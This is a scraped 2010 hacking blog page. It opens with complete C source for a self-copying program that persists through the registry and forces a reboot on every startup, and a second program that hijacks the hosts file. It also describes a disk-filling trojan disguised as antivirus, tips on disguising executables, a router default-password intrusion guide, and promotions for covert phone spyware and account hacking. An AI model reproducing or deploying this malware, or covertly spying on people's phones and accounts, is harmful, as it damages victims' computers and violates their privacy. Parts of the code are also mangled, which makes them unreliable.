Friday, July 2, 2010

A Virus Program to Restart the Computer at Every Startup

0 comments
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.




For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.



Here is the source code.



#include

#include

#include



int found,drive_no;char buff[128];



void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}



void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;



case 2:

target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;



case 3:

target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;



case 4:

target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;



default:

exit(0);

}



while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}



else

system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}

NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.

Compiling The Scource Code Into Executable Virus.





1. Download the Source Code Here



2. The downloaded file will be Sysres.C



3. For step-by-step compilation guide, refer my post How to compile C Programs.





Testing And Removing The Virus From Your PC





You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.





1. Reboot your computer in the SAFE MODE



2. Goto

A Virus Program to Block Websites

0 comments
Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.




This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.



NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?Here is the sourcecode of the virus.



#include

#include

#include



char site_list[6][30]={

“google.com”,

“www.google.com”,

“youtube.com”,

“www.youtube.com”,

“yahoo.com”,

“www.yahoo.com”

};

char ip[12]=”127.0.0.1″;

FILE *target;



int find_root(void);

void block_site(void);



int find_root()

{

int done;

struct ffblk ffblk;//File block structure



done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



else return 0;

}



void block_site()

{

int i;

fseek(target,0,SEEK_END); /*to move to the end of the file*/



fprintf(target,”\n”);

for(i=0;i<6;i++)

fprintf(target,”%s\t%s\n”,ip,site_list[i]);

fclose(target);

}



void main()

{

int success=0;

success=find_root();

if(success)

block_site();

}



How to Compile ?



For step-by-step compilation guide, refer my post How to compile C Programs.



Testing



1. To test, run the compiled module. It will block the sites that is listed in the source code.



2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.



3. To remove the virus type the following the Run.



%windir%\system32\drivers\etc4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this



127.0.0.1 google.com5. Delete all such entries which contain the names of blocked sites.



NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?Popularity: 10% [?

How to Make a Trojan Horse

0 comments
Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…




Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.





Now lets move to the working of our Trojan



The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.





The algorithm of the Trojan is as follows



1. Search for the root drive



2. Navigate to WindowsSystem32 on the root drive



3. Create the file named “spceshot.dll”



4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full



5. Once the drive is full, stop the process.



You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable

A Virus Program to Disable USB Ports

0 comments
In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.




Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.



1. Download the USB_Block.rar file on to your computer.



2. It contains the following 4 files.



■block_usb.c (source code)

■unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.



3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).



4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.



5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).



I hope you like this post. Please pass your comments.



Popularity: 16% [?]

Hack BSNL Broadband for Speed

0 comments
If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:




208.67.222.222

208.67.220.220

Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.



Popularity: 10% [?]

How to Hack an Ethernet ADSL Router

0 comments
Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.




Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.



Before you proceed, you need the following tool in the process



Angry IP Scanner



Here is a detailed information on how to exploit the vulnerability of an ADSL router.



Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.



Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.

Sunday, June 20, 2010

Secret Google Search Tricks

0 comments

Google Trick -1 :- GOOGLE OPERATOR
Type the following highlited words in google search box.
Google has several google operators that can help you find specific information, specific websites or inquire about the indexing of your own   site, below you will find the most important ones:   
 
Click on the example google trick, and You will be redirected to google.
define: - This google operator will find definitions for a certain term or  word over the Internet. Very useful when you come across a strange word when writing a post. I use this as a google dictionary. example : (define computer)
info: - The google info operator will list the sets of information that    Google has from a specific website (i.e. info:http://hack2007.50webs.com)
site: - This google operator can be used to see the number of indexed     pages on your site (i.e.site:www.hack2007.50webs.com).                  Alternative it can also be used to search for information inside a specific        site or class of sites.
link: - This google link operator allows you to find backlinks pointing         to your site. Unfortunately the count is not updated frequently and             not all backlinks are shown
allinurl: - Using this Google operator will limit the search to results         that contain the desired keywords on the URL structure. (i.e. allinurl:dailyblogtips)
fileformat: - Useful Google operator for finding specific file formats. Sometimes you know that the information you are looking for is likely to be contained in a PDF document or on a PowerPoint presentation, for instance. (i.e. “fileformat:.pdf market research” will search for PDF documents that contain the terms “market” and “research”)

Increase your RAM by Increasing system speed

0 comments
1). Start any application, say Word. Open some large documents.

2). Press
CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
 
3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).
 
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
 
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.
                In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

Wednesday, June 16, 2010

Cell Phone Spy: How to Spy on Cell Phones

0 comments
Need a Cell Phone Spy Software to spy on cheating spouse or monitor your teen’s text messages? Well, here is a way to turn Someone’s Mobile Phone into a Spyphone and record every activity with the world’s most powerful spy software. All this is possible within minutes from now!

Today there exists a lot of cell phone spy softwares on the market and as a result people often find it difficult to choose the right one to fit their needs. In order to help our readers to find the best spy software, we have decided to give a thorough review of the Top 2 Best Selling Cell Phone Spy softwares on the market.

Is your Nokia Cell Phone Original

0 comments
Nokia is one of the largest selling phones across the globe. Most of us own a Nokia phone but are unaware of it’s originality. Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.
Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).
Then check the 7th and 8th numbers
Phone serial no. x x x x x x ? ? x x x x x x x

Get a Call from your own Cell Phone number

0 comments
Here is a trick to get a call to your cell phone from your own number. Do you think I am crazy? No, I am not…….
Just try the following steps and you’ll get a call to your cell phone from your own number.
1. Just give a missed call to this number. You’ll not be charged!

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number
3. Receive the call. You’ll hear a lady voice asking for a PIN number. Just enter some rubbish number.
4. She say’s- Your PIN cannot be processed and the call disconnects..

 

How to Spoof Caller ID – Caller ID Spoofing

0 comments
Caller ID spoofing is the act of making the telephone network to display any desired (Fake) number on the recipient’s Caller ID display unit instead of the original number. The Caller ID spoofing can make a call appear to have come from any phone number that the caller wishes.

Friday, June 11, 2010

How to Hack MySpace Account

0 comments
If you are wondering to know how to hack MySpace account then you have landed at the right place. MySpace is one of the most widely used Social Networking website by many teenagers and adults across the globe. I have seen many cheaters create secret MySpace accounts in order to have secret relationships with another person. So, it’s no wonder why many people want to hack into Myspace account to reveal the secret. 

Top Reasons why you shouldn’t buy an iphone

0 comments
The much hyped iPhone 3G was launched in India a few weeks back and we have seen many issues and open security flaws in the new iPhone.Here I have some of the top reasons for …

Monday, June 7, 2010

What is CAPTCHA and How it Works?

0 comments
CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.

Friday, June 4, 2010

IP Address Hack, n all bt it !!This is a featured page

0 comments
Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer

Tuesday, June 1, 2010

How to Change the Logon Screen Background in Windows 7

0 comments
How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.

Saturday, May 29, 2010

Learn How To Hack With The Hacker’s Underground Handbook

0 comments
I wish this book was around when I began my journey to learn how to hack. It was made specifically for the beginners who really want to get into hacking and for those of us who began and got lost.I was really surprised how this book laid out the information, presenting it in an easy to read and understandable fashion. In each chapter the author first introduces you to the topic and then shows you a real-world example with step-by-step instructions with images. It makes hacking look so easy!

How to Protect an Email Account from SPAM

0 comments
Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.

Thursday, May 27, 2010

How To Hack Orkut ???

0 comments
Using Keyloggers is one of the Easiest Way to Hack Orkut password. Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.

Monday, May 24, 2010

How to Recover Hacked Email Accounts?

0 comments
It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.
 

Friday, May 21, 2010

How to Hack a Yahoo Password

0 comments
Everyday I get a lot of emails from people asking how to hack a Yahoo password? So if you’re curious to know how to hack Yahoo then this is the post for you. In this post I …

READ MORE

Thursday, May 20, 2010

What is MD5 Hash and How to Use it?

0 comments
In this post I will explain you about one of my favorite and interesting cryptographic algorithm called MD5 (Message-Digest algorithm 5). This algorithm is mainly used to perform file integrity checks under most circumstances. Here I will

  READ MORE  

Monday, May 17, 2010

Phishing Tools Available Online

0 comments
Tools that can help people potentially defraud innocent surfers are available for free download on the internet, it has been claimed.
The do-it-yourself kits provide all the essential tools for launching phishing attacks – those that …

READ MORE

A Closer Look at a Vulnerability in Gmail

0 comments
 Gmail is one of the major webmail service provider across the globe. But as we all know Gmail still carries that 4 letter word BETA. Sometimes we may wonder, why Gmail is still in the …

READ MORE

How to Recover Deleted Files from Windows and Mac

0 comments
How to Recover Deleted Files

Have you accidentally deleted your files from the Hard disk? Do you desperately want to recover them back? Well you need not panic! It is possible to recover the deleted files back from …

READ MORE

Friday, May 14, 2010

Porn Blocker – How to Block Internet Porn

0 comments
Porn Blocker – Block Porn Completely

Due to a rapid increase in the number of porn websites across the Internet, finding porn is as simple as Googling the word ’sex’. Exposure to pornography can have a serious impact …

READ MORE

Wednesday, May 12, 2010

Domain Hijacking – How to Hijack a Domain

0 comments
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

Tuesday, May 11, 2010

HOW-TO GUIDES, REGISTRY HACKS, VISTA HACKS, WIN 7 HACKS, XP HACKS »

0 comments
If you are running a Microsoft Windows operating system on your computer, then you are most likely aware of the fact that your PC will have a Product ID. This Product ID is a system specific alphanumeric code which is derived/calculated based on the Windows product key you use and the hardware configuration of your Computer. In simple words, Product ID is the alphanumeric code that you see when you Right-Click on the My Computer icon and select the Properties option.

READ MORE

 

Sunday, May 9, 2010

Free email password hacking software 3.0.1.5 Download

0 comments


Email Password Hacking Software break user's Gmail, Yahoo, MSN, Hotmail account password in easy way. Email Password Hacking Software crack secret code string of all password protected Windows application and decrypt asterisks character in their original format. Email Password Hacking Software allow user to hack password of Autocomplete form, search engine / news group account, all FTP clients etc and save password at user specified location.

DOWNLOAD

Faronics Anti-Executable Standard 3.50.2100.406-Free Mobile Antivirus

0 comments
Faronics Anti-Executable protects workstations from unwanted software by preventing unauthorized executables ... Anti-Executable Enterprise 3.50.2100.406 more, Buy Now Add Evalution ... Anti-Executable Server Standard 3.50.1111.406 more ...

DOWNLOAD

Saturday, May 8, 2010

Reset NOKIA Security code – THC NOKIA UNLOCK

1 comments
"The Phone Lock prevents your phone data from being accessed if

Your phone is stolen.


"The lock code is a number that prevents unauthorized persons from

Using your phone. These control codes are for your protection."


READ MORE

Ultimate Bluetooth Mobile Phone Spy -Free Full version Download

0 comments
Ultimate Bluetooth Mobile Phone Spy Software Edition 2008 will work on All mobile devices that are bluetooth enabled. Not just phones but also laptops, computers, etc. YOU WILL RECEIVE SEPERATE SOFTWARE FOR OLD MODELS AND NEW MODELS (INCLUDING SYMBIAN PHONES). We don’t need to list compatible phones - this works on ALL phones

READ MORE

Friday, May 7, 2010

FREE GPRS: Airtel Mobile Hack

0 comments
FREE GPRS: Airtel Mobile Hack - Ripples of a Blogger/SEO Dude from Cochin. ... NOW for AIRTEL users this is a latest trick this is for only serious HACKERS ... Let start hacking ,search on the software the network manually then select ...

READ MORE

Wednesday, May 5, 2010

How To Speed Up PC

0 comments

Are you sick and tired of slow PC performance? Do you wish your computer run like it did when you first bought it? Since your computer is like any other machine, it needs maintenance to stay in top health.With Perfect Optimizer you can restore your computer to like-new condition, all with a simple click of the mouse

READ MORE

Monday, May 3, 2010

How to Sniff Passwords Using USB Drive

0 comments

 As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords …

 READ MORE

Saturday, May 1, 2010

How to use Google for Hacking

0 comments
Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be

Thursday, April 29, 2010

How To Abort The Mistaken Shutdown Operation In Windows

0 comments

You’ve mistakenly pressed shutdown button on your pc or you mistakenly choose restart
Read More...
                                 

Wednesday, April 28, 2010

Hping - Active Network Security Tool

0 comments
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

While hping was mainly used as a security tool in the past, it can be used in many ways by people that don't care about security to test networks and hosts. A subset of the stuff you can do using hping:
  • Firewall testing
  • Advanced port scanning
  • Network testing, using different protocols, TOS, fragmentation
  • Manual path MTU discovery
  • Advanced traceroute, under all the supported protocols
  • Remote OS fingerprinting
  • Remote uptime guessing
  • TCP/IP stacks auditing
  • hping can also be useful to students that are learning TCP/IP.
Hping works on the following unix-like systems: Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows.

Download NetStumbler 0.4.0 Build 554 - Detect Wireless Local Area

0 comments
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
  • Verify that your network is set up the way you intended.
  • Find locations with poor coverage in your WLAN.
  • Detect other networks that may be causing interference on your network.
  • Detect unauthorized “rogue” access points in your workplace.
  • Help aim directional antennas for long-haul WLAN links.
  • Use it recreationally for WarDriving.

Tuesday, April 27, 2010

Kismet-802.11 layer2 wireless network detector

0 comments
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Cain and Abel Freeware download and review - password recovery

0 comments
Cain and Abel is a password recovery tool that enables network administrators to test network security, or home users to recover a variety of stored network passwords. The program reports sniffing and recovery of most popular protocols, including FTP, SMTP, POP3, HTTP, mySQL, ICQ, Telnet and others. It can also recover passwords hidden behind asterisk (***), stored in VNC profiles, SQL Server Enterprise Manager, Remote Desktop connections and wireless connections. Other features include LSA Secrets Dumper, Protected Storage password revealer, network enumeration, VoIP filtering and more. Probably one of the most complete network password recovery/security tools you can find. Cain and Abel is intended for network administrators or advanced users. (--- NOTE: Expect your antivirus software to alert you of a password cracking or hacking tool when installing this software! ---)

LCP 5.04: Download LCP 5.04 - Windows Account Passwords Auditing

0 comments
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Windows operating systems keep their passwords into an encrypted form called "hashes". Passwords cannot be retrieved directly from hashes. To recover passwords it is necessary to compute hashes by possible passwords and compare them to the existing hashes. Password auditing includes check of possible ways to retrieve user accounts information. Result of password recovery is passwords in case-sensitive form.
There are several ways to obtain password hashes, depending on their location and existing access. Password hashes can be obtained from SAM file or its backup, directly from local or remote computer registry, from registry or Active Directory on local or remote computer by means of DLL injection, from a network sniffer.

Monday, April 26, 2010

Download PuTTY - a free SSH and telnet client for Windows

0 comments
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. PuTTY is open source software that is available with source code and is developed and supported by a group of volunteers.

Here are the PuTTY files themselves:
  • PuTTY (the Telnet and SSH client itself)
  • PSCP (an SCP client, i.e. command-line secure file copy)
  • PSFTP (an SFTP client, i.e. general file transfer sessions much like FTP)
  • PuTTYtel (a Telnet-only client)
  • Plink (a command-line interface to the PuTTY back ends)
  • Pageant (an SSH authentication agent for PuTTY, PSCP and Plink)
  • PuTTYgen (an RSA and DSA key generation utility

Eraser 6.0.7.1893 (Free Advanced Security Tool)

0 comments
Department of Defence and Solid-State Memory and are based on Peter Gutmann’s paper Secure Deletion of the one defined in the National Industrial Security Program Operating Manual of Data from the hard drive. Eraser The patterns used for overwriting are selected completely to remove sensitive data from your own overwriting methods.Eraser Other methods include the U.S. Eraser is an advanced security tool for Windows that allows you effectively to remove magnetic remnants from Magnetic and overwriting with carefully selected patterns. With Eraser You can also define your hard drive by overwriting Eraser several times with pseudorandom data.
Eraser Features :
Eraser works with Windows XP, Windows Vista, Windows Server 2003 and Windows Server 2008.
Windows 98, ME, NT, 2000 can still be used with version 5.7!.
Eraser works with any drive that works with Windows.
Eraser Secure drive erasure methods are supported out of the box.
Erases files or folders and their previous deleted counterparts.
Eraser Works with an extremely customisable Scheduler

Yersinia Is A Network Tool - Free download

0 comments
Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
Currently, there are some network protocols implemented, but others are coming (tell us which one is your preferred). Attacks for the following network protocols are implemented (but of course you are free for implementing new ones):
  • Spanning Tree Protocol (STP)
  • Cisco Discovery Protocol (CDP)
  • Dynamic Trunking Protocol (DTP)
  • Dynamic Host Configuration Protocol (DHCP)
  • Hot Standby Router Protocol (HSRP)
  • IEEE 802.1Q
  • IEEE 802.1X
  • Inter-Switch Link Protocol (ISL)
  • VLAN Trunking Protocol (VTP)

Free Download Wireshark Latest Full version

0 comments
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Thursday, April 22, 2010

Security Database Tools Watch - pofv2.0.8 Finger Printing Tool

0 comments
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
– machines that connect to your box (SYN mode),
– machines you connect to (SYN+ACK mode),
– machine you cannot connect to (RST+ mode),
– machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Super Scan - Freeware Network Scanner

0 comments
SuperScan is a powerful TCP port scanner, that includes a variety of additional networking tools like ping, traceroute, HTTP HEAD, WHOIS and more. It uses multi-threaded and asynchronous techniques resulting in extremely fast and versatile scanning. You can perform ping scans and port scans using any IP range or specify a text file to extract addresses from. Other features include TCP SYN scanning, UDP scanning, HTML reports, built-in port description database, Windows host enumeration, banner grabbing and more.

Wednesday, April 21, 2010

Nikto - Web Server Scanner

0 comments
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs, checks for outdated versions of over 950 servers, and version specific problems on over 260 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated

Followers

Archive

 

A2HACK | ONE STOP OF HACKERS. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com